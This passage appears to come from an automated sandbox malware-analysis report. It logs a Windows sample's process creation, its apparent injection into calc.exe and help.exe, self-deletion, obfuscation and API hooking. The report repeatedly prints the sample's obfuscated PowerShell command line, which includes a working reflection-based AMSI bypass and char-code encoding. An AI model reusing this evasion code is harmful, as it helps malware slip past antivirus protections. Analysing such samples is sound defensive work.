'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\calc.exe {path}
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\WINDOWS\syswow64\calc.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\calc.exe {path}
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\WINDOWS\syswow64\calc.exe'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: Binary string: calc.pdbGCTL source: help.exe, 00000013.00000002.497718223.0000000002F8F000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.298383788.0000000007180000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: calc.exe, 00000009.00000002.342996454.000000000349F000.00000040.00000001.sdmp, help.exe, 00000013.00000002.497203365.0000000002B7F000.00000040.00000001.sdmp
          Source: Binary string: calc.pdb source: help.exe, 00000013.00000002.497718223.0000000002F8F000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: calc.exe, help.exe
          Source: Binary string: help.pdbGCTL source: calc.exe, 00000009.00000002.342338201.0000000002DD0000.00000040.00000001.sdmp
          Source: Binary string: help.pdb source: calc.exe, 00000009.00000002.342338201.0000000002DD0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.298383788.0000000007180000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Obfuscated command line foundShow sources
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: s2rsXUiUn8.exeStatic PE information: section name: .xdata
          Source: s2rsXUiUn8.exeStatic PE information: section name: .vmp0
          Source: s2rsXUiUn8.exeStatic PE information: section name: .cobf
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0041682D push es; retf
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0040102E push esp; iretd
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0041A1B1 push ecx; iretd
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0041CEF2 push eax; ret
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0041CEFB push eax; ret
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0041CEA5 push eax; ret
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0041CF5C push eax; ret
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_004177B7 push ebp; retf
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033FD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ADD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001B682D push es; retf
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001BA1B1 push ecx; iretd
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001BD4A2 push FFFFFFB8h; retf
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001BCEA5 push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001BCEFB push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001BCEF2 push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001BCF5C push eax; ret
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_001B77B7 push ebp; retf
          Source: initial sampleStatic PE information: section name: .vmp0 entropy: 7.19991970418

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x86 0x6E 0xE3
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
